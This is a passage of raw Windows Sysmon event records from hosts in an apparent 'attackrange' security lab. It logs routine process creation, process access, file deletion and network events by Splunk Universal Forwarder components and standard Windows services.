Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057438Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:29.663{5EBD8912-8E45-6151-CB00-00000000FD01}4024C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001057437Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:29.209{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A5E88F5E7B108ED7C0784FC631E16F4,SHA256=C2452A345CEFEDCB7F02C803E6046341D44B56C0C5DDFD9F2C95F24A8ED2F03D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981858Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:29.257{69CF5F33-8E45-6151-2E7A-00000000FD01}29962080C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981857Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:29.069{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8E45-6151-2E7A-00000000FD01}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981856Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:29.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981855Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:29.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981854Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:29.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981853Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:29.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981852Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:29.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981851Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:29.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981850Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:29.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981849Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:29.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981848Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:29.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981847Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:29.069{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8E45-6151-2E7A-00000000FD01}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981846Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:29.053{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8E45-6151-2E7A-00000000FD01}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981845Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:29.054{69CF5F33-8E45-6151-2E7A-00000000FD01}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000981844Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:25.847{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59572-false10.0.1.12-8000- 23542300x8000000000000000981861Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:30.944{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BBFB337EE7249989009257C31D7B35F,SHA256=8A955608B8518AB3BDBB9F3D1A3AD3195665466B5C7126441960EB0FC8BC1638,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057457Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:30.803{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8E46-6151-CC00-00000000FD01}5364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057456Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:30.803{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057455Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:30.803{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057454Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:30.803{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057453Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:30.803{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057452Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:30.803{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8E46-6151-CC00-00000000FD01}5364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057451Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:30.803{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8E46-6151-CC00-00000000FD01}5364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057450Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:30.804{5EBD8912-8E46-6151-CC00-00000000FD01}5364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001057449Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:30.725{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9C4FAE8C1383C3A037AB9E5CA705DA6C,SHA256=609B00C194CC7BD265BC3B593448F1B94F1A3D0E157D1AB6A2D2E12B6A9EBAF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057448Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:30.725{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E6E0948CA530D515E2852F22C67226FA,SHA256=79C9D42916FAD3B44D6F4BDB5B8EDBA026FD774AE2C5CCA1A2414A35A21E0F66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057447Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:30.209{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92A8BAA56904D7BA860718224030AE4D,SHA256=B3A341CB89510846EE8E7BD8EC49C7A219EBA69F8CFDB279ED4EFA65C633FE1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981860Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:30.163{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C37187CF5AE1AF1F03DE169CE82322F9,SHA256=D36326759C91BAE3D5F1EFC0773F0D249427BFE894CD2246AF672CEEFAF3EC47,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057446Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 